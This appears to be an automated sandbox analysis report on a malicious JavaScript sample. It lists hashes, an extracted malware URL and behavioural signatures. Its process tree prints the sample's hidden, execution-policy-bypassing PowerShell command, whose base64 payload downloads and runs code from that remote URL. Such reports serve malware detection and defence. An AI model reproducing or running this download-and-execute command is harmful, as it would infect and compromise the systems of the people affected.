Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24-12-2023 20:17
Static task
static1
Behavioral task
behavioral1
Sample
105d3e5738461fc9264399630f1b06ac.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
105d3e5738461fc9264399630f1b06ac.js
Resource
win10v2004-20231215-en
General
-
Target
105d3e5738461fc9264399630f1b06ac.js
-
Size
136KB
-
MD5
105d3e5738461fc9264399630f1b06ac
-
SHA1
53befad5d1bbbf1cb6893f2162a775758f9231ee
-
SHA256
381a5f54a0938c0d931478e744ee7233c70f639fbaf0f1799be54a0149735bf2
-
SHA512
d4fdd5c48bd2af9c52705aa63d4ecd66312cbde00d470e0645dd5998d8b82c1d2e2c5a9b4c19cdc19471223fa7f4bd55aa2f75db38a7e253ded6854ed72bf0a0
-
SSDEEP
3072:i2p4TdQHfEoRzvwH9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8V:iEP0H9Ry9RuXqW4SzUHmLKeMMU7GwWB6
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2704 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2332 2168 wscript.exe 28 PID 2168 wrote to memory of 2332 2168 wscript.exe 28 PID 2168 wrote to memory of 2332 2168 wscript.exe 28 PID 2332 wrote to memory of 2704 2332 cmd.exe 30 PID 2332 wrote to memory of 2704 2332 cmd.exe 30 PID 2332 wrote to memory of 2704 2332 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\105d3e5738461fc9264399630f1b06ac.js1⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-